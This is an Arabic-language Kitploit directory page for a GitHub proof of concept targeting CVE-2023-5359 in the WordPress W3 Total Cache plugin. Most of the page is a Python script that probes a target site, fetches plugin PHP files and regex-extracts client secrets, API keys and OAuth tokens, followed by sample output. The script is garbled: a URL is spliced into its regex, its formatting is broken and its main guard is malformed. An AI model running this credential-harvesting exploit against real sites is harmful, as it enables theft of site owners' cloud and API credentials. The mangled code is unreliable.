Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Cleartext-Storage-vulnerability-CVE-2023-5359-in-W3-Total-Cache — يستهدف الإصدارات ≤2.7.5 المعرضة لـ CVE-2023-5359 | Kitploit
أدوات/GitHubGitHub/spyata123/cleartext-storage-vulnerability-cve-2023-5359-in-w3-total-cache
الاستطلاعهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويب
GitHubspyata123/cleartext-storage-vulnerability-cve-2023-5359-in-w3-total-cache

Cleartext-Storage-vulnerability-CVE-2023-5359-in-W3-Total-Cache

يستهدف الإصدارات ≤2.7.5 المعرضة لـ CVE-2023-5359

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

ثغرة تخزين النص الصريح (CVE-2023-5359) في W3-Total-Cache

يستهدف الإصدارات ≤2.7.5 المعرضة للثغرة CVE-2023-5359


import requests import re from urllib.parse import urljoin

Common paths where credentials are stored

CREDENTIAL_PATHS = [ "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php", "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php", "/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php" ]

def check_w3tc_presence(target_url): """Check if W3 Total Cache is installed""" try: response = requests.get(target_url, timeout=10) if "wp-content/plugins/w3-total-cache" in response.text: return True return False except Exception as e: print(f"Connection error: {str(e)}") return False

def extract_credentials(target_url): """Extract plaintext credentials from vulnerable files""" credentials = {}

root@kitploit:~
for path in CREDENTIAL_PATHS:
    full_url = urljoin(target_url, path)
    try:
        response = requests.get(full_url, headers={"User-Agent": "Mozilla/5.0"})
        if response.status_code == 200:
            # Search for common credential patterns
            matches = re.findall(
                r"(client_id|client_secret|api_key|oauth_token)\s*=\s*['\"](https://github.com/spyata123/cleartext-storage-vulnerability-cve-2023-5359-in-w3-total-cache/blob/main/%5Ba-zA-Z0-9-_%5D%2B)['\"]",
                response.text
            )
            if matches:
                credentials[path] = dict(matches)
    except Exception as e:
        continue
        
return credentials

def main(): target = input("Enter target URL (e.g., https://example.com): ").strip()

root@kitploit:~
if not check_w3tc_presence(target):
    print("[-] W3 Total Cache not detected")
    return

print("[+] W3 Total Cache detected. Checking for CVE-2023-5359...")

creds = extract_credentials(target)

if creds:
    print("\n[!] Sensitive credentials found:")
    for filepath, data in creds.items():
        print(f"\nFile: {filepath}")
        for key, value in data.items():
            print(f"  {key}: {value}")
else:
    print("[+] No credentials found in common locations")

if name == "main": main()

أدخل عنوان URL الهدف (مثل https://example.com): https://vulnerable-site.com [+] تم الكشف عن W3 Total Cache. جاري التحقق من CVE-2023-5359...

[!] تم العثور على بيانات اعتماد حساسة:

الملف: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php client_id: GOxxxxxxxxxxxx78 client_secret: ABcdEFghIJklMNopQRstUVwxYZ

الملف: /wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php api_key: AiiiihIwJKLmnopkhdhsQRSTUVWXYZ-123456

تنزيل الأداة